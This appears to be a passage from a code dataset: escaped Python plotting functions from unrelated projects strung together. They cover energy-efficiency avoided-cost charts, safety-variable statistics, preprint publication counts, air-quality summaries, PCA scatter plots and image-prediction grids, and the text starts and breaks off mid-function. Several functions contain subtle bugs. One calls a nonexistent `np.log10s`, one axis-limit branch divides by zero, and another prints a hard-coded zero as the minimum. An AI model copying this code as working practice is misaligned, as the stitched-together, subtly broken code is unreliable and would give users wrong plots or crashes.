ax.set_ylim(ymin * 1.1, ymax * 1.08)\n\n # Set x and y axis labels\n ax.set_xlabel(\"Hour of Day\", size=17, labelpad=5)\n ax.set_ylabel(\"$ Avoided Costs\", size=17)\n\n # Set plot title, size, and position\n ax.set_title(\n \"Sum of Electric Avoided Costs by Component and Hour of Day\",\n size=17,\n loc=\"left\",\n )\n\n # Tick and lebel parameters\n ax.tick_params(bottom=True, top=False, left=True, right=False)\n ax.set_xticks(np.arange(0, 24, step=4))\n ax.set_yticks(\n np.arange(\n int(round(ymin * 1.1, 0)),\n ymax * 1.08,\n step=max(round(ymax - ymin, 2) / 5, int((round(ymax - ymin, 0)) / 4)),\n )\n )\n ax.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n\n # Minor ticks\n ax.xaxis.set_minor_locator(AutoMinorLocator())\n ax.yaxis.set_minor_locator(AutoMinorLocator())\n\n # Legend\n plt.legend(\n legend_labels,\n bbox_to_anchor=(1, 1),\n fontsize=12,\n loc=\"upper left\",\n frameon=False,\n )\n\n # avoided_cost_summary_plot\n fig3, (ax1, ax2, ax3) = plt.subplots(\n 3, 1, figsize=(6, 10), sharex=True, sharey=False\n )\n axs = [ax1, ax2, ax3]\n hod = elec_benefits_sum_by_hod.index\n legend_labels = [\"Total\", \"Summer\", \"Shoulder\", \"Winter\"]\n\n ax1.plot(\n hod,\n total_benefits,\n c=\"royalblue\",\n marker=\"$\\u25EF$\",\n markersize=10,\n linewidth=3,\n linestyle=\"-\",\n )\n ax1.plot(hod, summer_benefits, c=\"darkorchid\", linewidth=1, linestyle=\"--\")\n ax1.plot(hod, shoulder_benefits, c=\"olivedrab\", linewidth=1, linestyle=\":\")\n ax1.plot(hod, winter_benefits, c=\"teal\", linewidth=1, linestyle=\"-\")\n ax2.plot(\n hod,\n total_savings,\n c=\"firebrick\",\n marker=\"$\\u2206$\",\n markersize=10,\n linewidth=3,\n linestyle=\"-\",\n )\n ax2.plot(hod, summer_savings, c=\"darkorchid\", linewidth=1, 
linestyle=\"--\")\n ax2.plot(hod, shoulder_savings, c=\"olivedrab\", linewidth=1, linestyle=\":\")\n ax2.plot(hod, winter_savings, c=\"teal\", linewidth=1, linestyle=\"-\")\n ax3.plot(\n hod,\n total_av_csts_avg,\n c=\"green\",\n marker=\"$\\u25A0$\",\n markersize=10,\n linewidth=3,\n linestyle=\"-\",\n )\n ax3.plot(hod, summer_av_csts_avg, c=\"darkorchid\", linewidth=1, linestyle=\"--\")\n ax3.plot(hod, shoulder_av_csts_avg, c=\"olivedrab\", linewidth=1, linestyle=\":\")\n ax3.plot(hod, winter_av_csts_avg, c=\"teal\", linewidth=1, linestyle=\"-\")\n\n leg1 = ax1.legend(legend_labels, fontsize=11, loc=\"upper left\", frameon=False)\n for line, text in zip(leg1.get_lines(), leg1.get_texts()):\n text.set_color(line.get_color())\n leg2 = ax2.legend(legend_labels, fontsize=11, loc=\"upper left\", frameon=False)\n for line, text in zip(leg2.get_lines(), leg2.get_texts()):\n text.set_color(line.get_color())\n leg3 = ax3.legend(legend_labels, fontsize=11, loc=\"upper left\", frameon=False)\n for line, text in zip(leg3.get_lines(), leg3.get_texts()):\n text.set_color(line.get_color())\n\n ax3.set_xticks(np.arange(0, 24, step=4))\n ax3.set_xlabel(\"Hour of Day\", size=14, labelpad=5)\n ax3.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=6, width=2, labelsize=12\n )\n ax3.set_xlim(hod.min() - hod.max() * 0.04, hod.max() * 1.04)\n ax3.xaxis.set_minor_locator(AutoMinorLocator())\n\n ax1.set_ylabel(\"TRC Benefits ($)\", size=14)\n ax2.set_ylabel(\"Savings (MWh)\", size=14)\n ax3.set_ylabel(\"Av. Cost ($/MWh)\", size=14)\n\n if max(total_benefits + summer_benefits + shoulder_benefits + winter_benefits) < 0:\n ymax1 = 0\n else:\n ymax1 = max(\n total_benefits + summer_benefits + shoulder_benefits + winter_benefits\n )\n if min(total_benefits + summer_benefits + shoulder_benefits + winter_benefits) > 0:\n ymin1 = 0\n else:\n ymin1 = min(\n total_benefits + summer_benefits + shoulder_benefits + winter_benefits\n )\n if max(total_savings + summer_savings + shoulder_savings + winter_savings) < 0:\n ymax2 = 0\n else:\n ymax2 = max(total_savings + summer_savings + shoulder_savings + winter_savings)\n if min(total_savings + summer_savings + shoulder_savings + winter_savings) > 0:\n ymin2 = 0\n else:\n ymin2 = min(total_savings + summer_savings + shoulder_savings + winter_savings)\n if (\n max(\n total_av_csts_avg\n + summer_av_csts_avg\n + shoulder_av_csts_avg\n + winter_av_csts_avg\n )\n < 0\n ):\n ymax3 = 0\n else:\n ymax3 = max(\n total_av_csts_avg\n + summer_av_csts_avg\n + shoulder_av_csts_avg\n + winter_av_csts_avg\n )\n if (\n min(\n total_av_csts_avg\n + summer_av_csts_avg\n + shoulder_av_csts_avg\n + winter_av_csts_avg\n )\n > 0\n ):\n ymin3 = 0\n else:\n ymin3 = min(\n total_av_csts_avg\n + summer_av_csts_avg\n + shoulder_av_csts_avg\n + winter_av_csts_avg\n )\n\n # Tick and lebel parameters\n ax1.set_ylim(ymin1 * 1.08, ymax1 * 1.08)\n ax2.set_ylim(ymin2 * 1.08, ymax2 * 1.08)\n ax3.set_ylim(ymin3 * 1.08, ymax3 * 1.08)\n\n ax1.set_yticks(\n np.arange(\n ymin1 * 1.08,\n ymax1 * 1.08,\n step=max(round(ymax1 - ymin1, 3) / 5, int((round(ymax1 - ymin1, 0)) / 4)),\n )\n )\n ax2.set_yticks(\n np.arange(\n ymin2 * 1.08,\n ymax2 * 1.08,\n step=max(round(ymax2 - ymin2, 3) / 5, int((round(ymax2 - ymin2, 0)) / 4)),\n )\n )\n ax3.set_yticks(\n np.arange(\n ymin3 * 1.08,\n ymax3 * 1.08,\n step=max(round(ymax3 - ymin3, 3) / 5, int((round(ymax3 - ymin3, 0)) / 4)),\n )\n )\n\n ax1.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=12\n )\n 
ax2.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=12\n )\n ax3.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=12\n )\n\n # Shade peak region\n ax1.axvspan(16, 21, alpha=0.2, color=\"grey\")\n ax2.axvspan(16, 21, alpha=0.2, color=\"grey\")\n ax3.axvspan(16, 21, alpha=0.2, color=\"grey\")\n\n # Print key information\n plt.annotate(\n \"Electric Benefits = $\" + str(round(elec_benefits[\"total\"].sum(), 2)),\n xy=(350, 530),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"Gas Benefits = $\" + str(round(gas_benefits, 2)),\n xy=(350, 505),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"Total Benefits = $\"\n + str(round(elec_benefits[\"total\"].sum() + gas_benefits, 2)),\n xy=(350, 480),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"TRC Costs = $\" + str(trc_costs_record),\n xy=(350, 455),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"PAC Costs = $\" + str(pac_costs_record),\n xy=(350, 430),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"TRC = \" + str(trc_record),\n xy=(350, 405),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"PAC = \" + str(pac_record),\n xy=(350, 380),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"Net Lifecycle Electric Savings = \" + str(lifecycle_net_mwh) + \" MWh\",\n xy=(350, 335),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"Net Lifecycle Gas Savings = \" + str(lifecycle_net_therms) + \" Therms\",\n xy=(350, 310),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"Net Lifecycle GHG Savings = \" + str(lifecycle_net_ghg) + \" Tons\",\n xy=(350, 285),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n str(round(100 * ((summer_peak_savings) / sum(total_savings)), 1))\n + \"% MWh savings during summer peak period\",\n xy=(350, 260),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n str(round(100 * ((summer_peak_benefits) / sum(total_benefits)), 1))\n + \"% Electric TRC benefits from summer peak period\",\n xy=(350, 235),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"Electric Benefits per MWh = $\"\n + str(round(elec_benefits[\"total\"].sum() / lifecycle_net_mwh, 2)),\n xy=(350, 210),\n xycoords=\"axes points\",\n fontsize=18,\n )\n plt.annotate(\n \"Typical Avoided Cost per MWh = $\"\n + str(round(elec_benefits[\"av_csts_levelized\"].mean(), 2)),\n xy=(350, 145),\n xycoords=\"axes points\",\n fontsize=18,\n )\n\n # Set plot title, size, and position\n ax1.set_title(\n \"Savings and Avoided Cost Profiles\", size=16, loc=\"left\"\n ).set_position([0, 1.03])\n\n # marginal_ghg_savings_plot\n cmp = sns.diverging_palette(16, 260, l=35, n=25, as_cmap=True)\n\n fig4 = plt.figure(figsize=(8, 6), dpi=100)\n ax1 = fig4.gca()\n y_ticks = [\n 0,\n \"\",\n 2,\n \"\",\n 4,\n \"\",\n 6,\n \"\",\n 8,\n \"\",\n 10,\n \"\",\n 12,\n \"\",\n 14,\n \"\",\n 16,\n \"\",\n 18,\n \"\",\n 20,\n \"\",\n 22,\n ]\n hmp = sns.heatmap(ghgsav, cmap=cmp, ax=ax1, yticklabels=y_ticks, center=0.00)\n ax1.set_xlabel(\"Month\", size=15)\n ax1.set_ylabel(\"Hour of Day\", size=15)\n ax1.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=6, width=2, labelsize=13\n )\n ax1.tick_params(\n which=\"major\",\n axis=\"y\",\n direction=\"out\",\n length=6,\n width=2,\n labelsize=13,\n rotation=0,\n )\n ax1.set_title(\"Electric GHG Savings by Month and Hour\", size=15, loc=\"left\", 
pad=8)\n cbar1 = hmp.collections[0].colorbar\n cbar1.ax.tick_params(labelsize=14)\n plt.annotate(\"Sum GHG\", xy=(370, 352), xycoords=\"axes points\", fontsize=12)\n plt.annotate(\"Savings (Tons)\", xy=(370, 336), xycoords=\"axes points\", fontsize=12)\n\n # month_hour_savings_benefits_plot\n fig5, (ax1, ax2) = plt.subplots(1, 2, figsize=(21, 10), dpi=200)\n y_ticks = [\n 0,\n \"\",\n 2,\n \"\",\n 4,\n \"\",\n 6,\n \"\",\n 8,\n \"\",\n 10,\n \"\",\n 12,\n \"\",\n 14,\n \"\",\n 16,\n \"\",\n 18,\n \"\",\n 20,\n \"\",\n 22,\n ]\n fleft = sns.heatmap(sav, cmap=cmp, ax=ax1, yticklabels=y_ticks, center=0.00)\n fright = sns.heatmap(avcsts, cmap=cmp, ax=ax2, yticklabels=y_ticks, center=0.00)\n ax1.set_xlabel(\"Month\", size=22)\n ax1.set_ylabel(\"Hour of Day\", size=22)\n ax2.set_xlabel(\"Month\", size=22)\n ax2.set_ylabel(\"Hour of Day\", size=22)\n ax1.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=6, width=2, labelsize=18\n )\n ax1.tick_params(\n which=\"major\",\n axis=\"y\",\n direction=\"out\",\n length=6,\n width=2,\n labelsize=18,\n rotation=0,\n )\n ax2.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=6, width=2, labelsize=18\n )\n ax2.tick_params(\n which=\"major\",\n axis=\"y\",\n direction=\"out\",\n length=6,\n width=2,\n labelsize=18,\n rotation=0,\n )\n ax1.set_title(\n \"MWh Savings by Month and Hour\", size=24, loc=\"left\", pad=15\n ).set_position([0, 1.1])\n ax2.set_title(\"$ Benefits by Month and Hour\", size=24, loc=\"left\", pad=15)\n fig4.tight_layout(pad=2.0)\n cbar1 = fleft.collections[0].colorbar\n cbar1.ax.tick_params(labelsize=18)\n cbar2 = fright.collections[0].colorbar\n cbar2.ax.tick_params(labelsize=18)\n plt.annotate(\"Sum MWh\", xy=(-200, 585), xycoords=\"axes points\", fontsize=20)\n plt.annotate(\"Savings\", xy=(-193, 560), xycoords=\"axes points\", fontsize=20)\n plt.annotate(\"Sum TRC\", xy=(435, 585), xycoords=\"axes points\", fontsize=20)\n plt.annotate(\"Benefits\", xy=(442, 560), xycoords=\"axes points\", fontsize=20)\n\n # savings_benefits_cumulative_sum_plot\n fig6 = plt.figure(figsize=(12, 7), dpi=250)\n ax1 = fig6.gca()\n ax1.plot(\n elec_benefits_hoy[\"hour_of_year\"],\n elec_benefits_hoy[\"hourly_savings\"],\n color=\"royalblue\",\n linewidth=3,\n )\n ax2 = ax1.twinx()\n ax2.plot(\n elec_benefits_hoy[\"hour_of_year\"],\n elec_benefits_hoy[\"total\"],\n color=\"firebrick\",\n linewidth=3,\n linestyle=\"--\",\n )\n ax2.axhline(y=0, color=\"gray\", linewidth=0.7, linestyle=\"--\")\n\n # Set x and y limits based on min and max values\n\n if (\n elec_benefits_hoy[\"hourly_savings\"].max() >= 0\n and elec_benefits_hoy[\"total\"].max() >= 0\n ):\n ymax1 = elec_benefits_hoy[\"hourly_savings\"].max()\n ymax2 = elec_benefits_hoy[\"total\"].max()\n elif (\n elec_benefits_hoy[\"hourly_savings\"].max() < 0\n and elec_benefits_hoy[\"total\"].max() < 0\n ):\n ymax1 = 0\n ymax2 = 0\n elif (\n elec_benefits_hoy[\"hourly_savings\"].max() < 0\n and elec_benefits_hoy[\"total\"].max() > 0\n ):\n ymax1 = (\n -1\n * elec_benefits_hoy[\"hourly_savings\"].min()\n * (\n elec_benefits_hoy[\"total\"].max()\n / (elec_benefits_hoy[\"total\"].max() - elec_benefits_hoy[\"total\"].min())\n )\n / (\n 1\n - elec_benefits_hoy[\"total\"].max()\n / (elec_benefits_hoy[\"total\"].max() - elec_benefits_hoy[\"total\"].min())\n )\n )\n ymax2 = elec_benefits_hoy[\"total\"].max()\n else:\n ymax1 = 0\n ymax2 = (\n -1\n * elec_benefits_hoy[\"total\"].min()\n * (\n elec_benefits_hoy[\"hourly_savings\"].max()\n / (\n 
elec_benefits_hoy[\"hourly_savings\"].max()\n - elec_benefits_hoy[\"hourly_savings\"].min()\n )\n )\n )\n\n if (\n elec_benefits_hoy[\"hourly_savings\"].min() <= 0\n and elec_benefits_hoy[\"total\"].min() <= 0\n ):\n ymin1 = elec_benefits_hoy[\"hourly_savings\"].min()\n ymin2 = elec_benefits_hoy[\"total\"].min()\n elif (\n elec_benefits_hoy[\"hourly_savings\"].min() > 0\n and elec_benefits_hoy[\"total\"].min() > 0\n ):\n ymin1 = 0\n ymin2 = 0\n elif (\n elec_benefits_hoy[\"hourly_savings\"].min() > 0\n and elec_benefits_hoy[\"total\"].min() < 0\n ):\n ymin1 = (\n -1\n * elec_benefits_hoy[\"hourly_savings\"].max()\n * (\n elec_benefits_hoy[\"total\"].min()\n / (elec_benefits_hoy[\"total\"].min() - elec_benefits_hoy[\"total\"].max())\n )\n / (\n 1\n - elec_benefits_hoy[\"total\"].min()\n / (elec_benefits_hoy[\"total\"].min() - elec_benefits_hoy[\"total\"].max())\n )\n )\n ymin2 = elec_benefits_hoy[\"total\"].min()\n else:\n ymin1 = 0\n ymin2 = (\n -1\n * elec_benefits_hoy[\"total\"].min()\n * (\n elec_benefits_hoy[\"hourly_savings\"].min()\n / (\n elec_benefits_hoy[\"hourly_savings\"].min()\n - elec_benefits_hoy[\"hourly_savings\"].min()\n )\n )\n )\n\n # Set x and y axis limits\n ax1.set_xlim(-340, 9000)\n ax1.set_ylim(ymin1 * 1.08, ymax1 * 1.08)\n ax2.set_ylim(ymin2 * 1.08, ymax2 * 1.08)\n\n # Set x and y axis labels\n ax1.set_xlabel(\"Hour of Year\", size=17, labelpad=5)\n ax1.set_ylabel(\"Net Lifecycle Savings (MWh)\", size=17)\n ax2.set_ylabel(\"$ TRC Benefits\", size=17, rotation=-90, labelpad=20)\n\n # Set plot title, size, and position\n ax1.set_title(\n \"Cumulative Savings and TRC Benefits by Hour of Year\",\n size=17,\n loc=\"left\",\n pad=8,\n )\n\n # Tick and lebel parameters\n ax1.set_xticks(np.arange(0, 8760, step=1000))\n ax1.set_yticks(\n np.arange(\n int(round(ymin1 * 1.1, 0)),\n ymax1 * 1.08,\n step=max(round(ymax1 - ymin1, 2) / 5, int((round(ymax1 - ymin1, 0)) / 4)),\n )\n )\n ax1.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax1.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n\n ax2.set_xticks(np.arange(0, 8760, step=1000))\n ax2.set_yticks(\n np.arange(\n int(round(ymin2 * 1.1, 0)),\n ymax2 * 1.08,\n step=max(round(ymax2 - ymin2, 2) / 5, int((round(ymax2 - ymin2, 0)) / 4)),\n )\n )\n ax2.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax2.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n\n # Minor ticks\n ax1.xaxis.set_minor_locator(AutoMinorLocator())\n ax1.yaxis.set_minor_locator(AutoMinorLocator())\n ax2.yaxis.set_minor_locator(AutoMinorLocator())\n\n # Legend\n ax1.legend(\n [\"Savings\"],\n fontsize=12,\n bbox_to_anchor=(0.02, 1),\n loc=\"upper left\",\n frameon=False,\n )\n ax2.legend(\n [\"TRC Beneftis\"],\n fontsize=12,\n bbox_to_anchor=(0.02, 0.95),\n loc=\"upper left\",\n frameon=False,\n )\n\n fig7 = plt.figure(figsize=(12, 7), dpi=250)\n ax = fig7.gca()\n colors1 = [\n \"black\",\n \"royalblue\",\n \"black\",\n \"pink\",\n \"firebrick\",\n \"gray\",\n \"darkviolet\",\n \"darkorange\",\n \"green\",\n \"saddlebrown\",\n ]\n legend_labels2 = []\n\n ax.plot(\n elec_benefits_hoy[\"hour_of_year\"],\n elec_benefits_hoy[ACC_COMPONENTS_ELECTRICITY[0]],\n color=colors1[0],\n linewidth=3,\n )\n legend_labels2.append(ACC_COMPONENTS_ELECTRICITY[0])\n x = 1\n while x <= len(ACC_COMPONENTS_ELECTRICITY) - 2:\n ax.plot(\n elec_benefits_hoy[\"hour_of_year\"],\n 
elec_benefits_hoy[ACC_COMPONENTS_ELECTRICITY[x]],\n color=colors1[x],\n )\n legend_labels2.append(ACC_COMPONENTS_ELECTRICITY[x])\n x += 1\n\n # Set x and y limits based on min and max values\n if max(elec_benefits_hoy.iloc[:, 2:x].max()) < 0:\n ymax = 0\n else:\n ymax = max(elec_benefits_hoy.iloc[:, 2:x].max())\n if min(elec_benefits_hoy.iloc[:, 2:x].min()) > 0:\n ymin = 0\n else:\n ymin = min(elec_benefits_hoy.iloc[:, 2:x].min())\n\n ax.set_xlim(-340, 9000)\n ax.set_ylim(ymin * 1.1, ymax * 1.08)\n\n # Set x and y axis labels\n ax.set_xlabel(\"Hour of Year\", size=17, labelpad=5)\n ax.set_ylabel(\"$ TRC Benefits\", size=17)\n\n # Set plot title, size, and position\n ax.set_title(\n \"Sum of Avoided Costs by Component and Hour of Day\", size=17, loc=\"left\"\n )\n\n # Tick and lebel parameters\n ax.set_xticks(np.arange(0, 8760, step=1000))\n ax.set_yticks(\n np.arange(\n int(round(ymin * 1.1, 0)),\n ymax * 1.08,\n step=max(round(ymax - ymin, 3) / 5, int((round(ymax - ymin, 0)) / 4)),\n )\n )\n ax.tick_params(\n which=\"major\", axis=\"x\", direction=\"out\", length=6, width=2, labelsize=14\n )\n ax.tick_params(\n which=\"major\", axis=\"y\", direction=\"out\", length=6, width=2, labelsize=14\n )\n\n # Minor ticks\n ax.xaxis.set_minor_locator(AutoMinorLocator())\n ax.yaxis.set_minor_locator(AutoMinorLocator())\n\n # Legend\n plt.legend(\n legend_labels2,\n bbox_to_anchor=(1, 1),\n fontsize=12,\n loc=\"upper left\",\n frameon=False,\n )", "def get_safety_vars_plot(self):\n if 'safety_vars_stats' not in self.stats:\n raise ValueError('No safety vars statistics present in this evaluator.')\n\n safety_vars = self.stats['safety_vars_stats'][0].keys()\n n_plots = len(safety_vars)\n fig, axes = plt.subplots(n_plots, 1, figsize=(8, 6 * n_plots))\n\n for idx, var in enumerate(safety_vars):\n series = collections.defaultdict(list)\n for ep in self.stats['safety_vars_stats']:\n for stat in ep[var]:\n series[stat].append(ep[var][stat])\n ax = axes[idx]\n for stat in ['min', 'max']:\n ax.plot(np.squeeze(np.array(series[stat])), label=stat)\n x = range(len(series['mean']))\n\n mean = np.squeeze(np.array(series['mean']))\n std_dev = np.squeeze(np.array(series['std_dev']))\n ax.plot(x, mean, label='Value')\n ax.fill_between(\n range(len(series['mean'])), mean - std_dev, mean + std_dev, alpha=0.3)\n ax.set_title('Stats for {}'.format(var))\n ax.legend()\n ax.spines['top'].set_visible(False)\n\n ax.xaxis.set_ticks_position('bottom')\n ax.set_xlabel('Episode #')\n ax.set_ylabel('Magnitude')\n ax.plot()\n return fig", "def plot_single(\n data_dict: dict,\n keys: str,\n x_ticks: List[str] = ['2015', '2016', '2017', '2018', '2019', '2020'],\n show_preprint: bool = False,\n title_text: str = '',\n figpath: str = 'comparison_plot.pdf',\n logscale=False,\n) -> None:\n\n sns.set_palette(sns.color_palette('colorblind', 10))\n plt.rcParams.update({'hatch.color': 'w'})\n plt.rcParams['figure.facecolor'] = 'white'\n plt.figure(figsize=(8, 5))\n\n arxiv, biorxiv, pubmed, medrxiv, chemrxiv, preprint = [], [], [], [], [], []\n\n for key in keys:\n try:\n arxiv.append(data_dict[key]['arxiv'])\n biorxiv.append(data_dict[key]['biorxiv'])\n medrxiv.append(data_dict[key]['medrxiv'])\n chemrxiv.append(data_dict[key]['chemrxiv'])\n pubmed.append(data_dict[key]['pubmed'])\n except KeyError:\n raise KeyError(\n f'Did not find all DBs for {key}, only found {data_dict[key].keys()}'\n )\n preprint.append(arxiv[-1] + biorxiv[-1] + medrxiv[-1] + chemrxiv[-1])\n\n ind = np.arange(len(arxiv[0])) # the x locations for the groups\n width = 
[0.75] * len(ind) # the width of the bars: can also be len(x) sequence\n fnc = np.log10 if logscale else np.copy\n\n plts = []\n legend_plts = []\n if show_preprint:\n bars = [pubmed, preprint]\n legend_platform = ['PubMed', 'Preprint']\n if logscale:\n sums = np.array(pubmed) + np.array(preprint)\n logsums = np.log10(sums)\n bars = [pubmed * logsums / sums, preprint * logsums / sums]\n\n else:\n bars = [pubmed, arxiv, biorxiv, chemrxiv, medrxiv]\n legend_platform = ['PubMed', 'ArXiv', 'BiorXiv', 'ChemRxiv', 'MedRxiv']\n if logscale:\n sums = (\n np.array(pubmed)\n + np.array(arxiv)\n + np.array(biorxiv)\n + np.array(chemrxiv)\n + np.array(medrxiv)\n )\n logsums = np.log10s(sums)\n bars = [\n pubmed * logsums / sums,\n arxiv * logsums / sums,\n biorxiv * logsums / sums,\n chemrxiv * logsums / sums,\n medrxiv * logsums / sums,\n ]\n for idx in range(len(keys)):\n bottom = 0\n\n for bidx, b in enumerate(bars):\n if idx == 0:\n p = plt.bar(\n ind,\n b[idx],\n width,\n linewidth=1,\n edgecolor='k',\n bottom=bottom,\n )\n else:\n p = plt.bar(\n ind,\n b[idx],\n width,\n color=next(iter(plts[bidx])).get_facecolor(),\n linewidth=1,\n edgecolor='k',\n bottom=bottom,\n )\n\n bottom += b[idx]\n plts.append(p)\n legend_plts.append(\n plt.bar(ind, np.zeros((len(ind),)), color='k', bottom=bottom)\n )\n\n plt.ylabel('Counts', size=17) if not logscale else plt.ylabel(\n 'Counts (log scale)', size=17\n )\n plt.xlabel('Years', size=17)\n plt.title(title_text, size=17)\n # Customize minor tick labels\n\n plt.xticks(ind, x_ticks, size=14)\n ymax = plt.gca().get_ylim()[1]\n if logscale:\n yticks = np.arange(1, ymax).astype(int)\n plt.yticks(yticks, np.power(10, yticks))\n\n plt.tick_params(axis='y', labelsize=17)\n\n plt.legend(\n legend_platform,\n prop={'size': 14},\n loc='upper left',\n title='Platform:',\n title_fontsize=17,\n ncol=1,\n )\n\n get_step_size = lambda x: round(x / 10, -math.floor(math.log10(x)) + 1)\n ymax = plt.gca().get_ylim()[1]\n\n for y_step in plt.yticks()[0]:\n plt.hlines(y_step, xmax=10, xmin=-1, color='black', linewidth=0.1)\n plt.xlim([-0.5, len(ind)])\n plt.ylim([0, ymax * 1.02])\n\n plt.tight_layout()\n plt.savefig(figpath)\n plt.show()", "def frame_stats(df, file=\"./frame_stats.pdf\", fontsize=16):\n \n temp = df\n \n matplotlib.rcParams.update({'font.size': 12})\n fig, (ax1, ax2,ax3) = plt.subplots(3, figsize=(10,8), sharex=True)\n\n ax1.plot(temp.index, temp.noise, ':')\n ax1.plot(temp.index, [.1 for i in temp.index], '--',color='k')\n ax1.fill_between(temp.index, 0.01,0.045, facecolor='blue', alpha=0.1)\n ax1.set( ylabel='Noise')\n ax1.yaxis.label.set_size(fontsize)\n\n ax2.plot(temp.index, temp.pseudo_ent/10, ':')\n ax2.plot(temp.index, [0.01 for i in temp.index], '--',color='k')\n ax2.set(ylabel='Signal',)\n ax2.yaxis.label.set_size(fontsize)\n ax2.xaxis.label.set_size(fontsize)\n\n ax3.plot(temp.index, temp[\"2dhist95pre\"]/10, ':')\n ax3.plot(temp.index, temp[\"2dhist99pre\"]/10, ':')\n ax3.fill_between(temp.index,temp[\"2dhist95pre\"]/10,temp[\"2dhist99pre\"]/10, facecolor='blue', alpha=0.1)\n ax3.set( ylabel='Narrow-band')#xlabel='Frame index',\n ax3.yaxis.label.set_size(fontsize)\n ax3.set_ylim(0,1)\n\n plt.xlabel(\"Time (15 minute intervals)\",fontsize=fontsize)\n \n plt.xlim(0,100)\n plt.subplots_adjust(hspace=0.1)\n fig.savefig(file,bbox_inches='tight')", "def summaryPlot(df):\n import datetime as dt\n import matplotlib.pyplot as plt\n import matplotlib as mpl\n import numpy as np\n import pandas as pd\n from numpy import array\n import matplotlib.patches as 
mpatches\n import seaborn as sns\n from matplotlib.pyplot import figure\n\n class color:\n # Allows for bolded and underlined text\n BOLD = \"\\033[1m\"\n UNDERLINE = \"\\033[4m\"\n END = \"\\033[0m\"\n\n # Reads df and fills empty values\n df.index = pd.to_datetime(df.date)\n df = df.drop(\"date\", axis=1)\n df_all = df.resample(\"1D\")\n df_all = df_all.fillna(method=\"ffill\")\n\n dataPoints = [\"pm25\", \"co\", \"so2\", \"pm10\", \"o3\", \"no2\", \"nox\", \"wd\", \"ws\"]\n\n i = 0\n sub = 1\n while i < 9:\n # Plots line and histogram plots for ecery polutant\n # in the correct location based on subplot\n plt.figure(1, figsize=(50, 50))\n plt.subplot(9, 2, sub)\n sub = sub + 1\n a = df_all[dataPoints[i]].plot.line(color=\"gold\")\n a.axes.get_xaxis().set_visible(False)\n a.yaxis.set_label_position(\"left\")\n plt.ylabel(dataPoints[i], fontsize=75, bbox=dict(facecolor=\"whitesmoke\"))\n # print(df['pm25'].max())\n\n plt.subplot(9, 2, sub)\n sub = sub + 1\n plt.hist(df_all[dataPoints[i]], bins=50, color=\"green\")\n i = i + 1\n i = 0\n while i < 9:\n # Calculates statistics\n nDf = df[dataPoints[i]]\n missing = nDf.isna().sum() + sum(n < 0 for n in nDf)\n minVal = nDf.min()\n maxVal = nDf.max()\n meanVal = nDf.mean()\n medianVal = nDf.median()\n percentile = nDf.quantile(0.95)\n print(\"---------------\")\n print(color.BOLD + color.UNDERLINE + dataPoints[i] + color.END)\n print(\"min = \" + str(0))\n print(\"max = \" + str(maxVal))\n print(\"missing = \" + str(missing))\n print(\"mean = \" + str(meanVal))\n print(\"median = \" + str(medianVal))\n print(\"95th percentile = \" + str(percentile))\n i = i + 1", "def plot_PCA():\n X, languages = prepare_data_matrix()\n #print(X)\n eigenvectors, eigenvalues=power_iteration_two_components(X)\n explain = explained_variance_ratio(X, eigenvectors, eigenvalues)\n X=project_to_eigenvectors(X,eigenvectors)\n\n #print(X)\n plt.title('Explained variance: %.3f' % explain)\n plt.scatter(X[:,0], X[:,1])\n for i in range(len(X)):\n plt.text(X[i,0], X[i,1], languages[i][:3])\n plt.show()", "def plot_results(infer_images, inference_predicted_class, inference_predictions, class_names=['plants', 'water']):\n plt.style.use(['dark_background', 'bmh'])\n rc('figure', figsize=(8, 8), max_open_warning=False)\n rc('axes', facecolor='none')\n plt.figure(figsize=(15, 15))\n\n for i, (infer_img, _) in enumerate(infer_images.take(10)):\n ax = plt.subplot(5, 2, i + 1)\n plt.imshow(infer_img.numpy()/255)\n\n # Find the predicted class from predictions\n m = \"Predicted: {}, {:.2f}%\".format(\n class_names[inference_predicted_class[i]], inference_predictions[i]*100)\n plt.title(m)\n plt.axis(\"off\")\n plt.show()", "def plot_prec_value1(self):\n# self.query_dict={'code':code.value,'exchange':exchange.value,\\\n# 'structure':struct.value,'element':element.value,'properties':prop.value}\n# print ('POSTING', self.query_dict)\n# self.query_api(endpoint='evk')\n\n #layout_doc.children[4].children[0] = self.plot_pade_figure()\n\n\n self.query_dict={'code':code.value,'exchange':exchange.value,\\\n 'structure':struct.value,'element':element.value,'properties':prop.value}\n print ('POSTING', self.query_dict)\n self.query_api(endpoint='evk')\n\n layout_doc.children[4].children[0] = self.plot_pade_figure()", "def plotPaperFigures(folder='results/'):\n #model Example\n _AiryDisc(amplitude=1e6, center_x=10.0, center_y=10.0, radius=0.5, focus=0.4, size=21)\n _CCDkernel(CCDx=10, CCDy=10, width_x=0.35, width_y=0.4, size=21)\n plotModelExample()\n\n #simulation figures\n theta1 = (2.e5, 
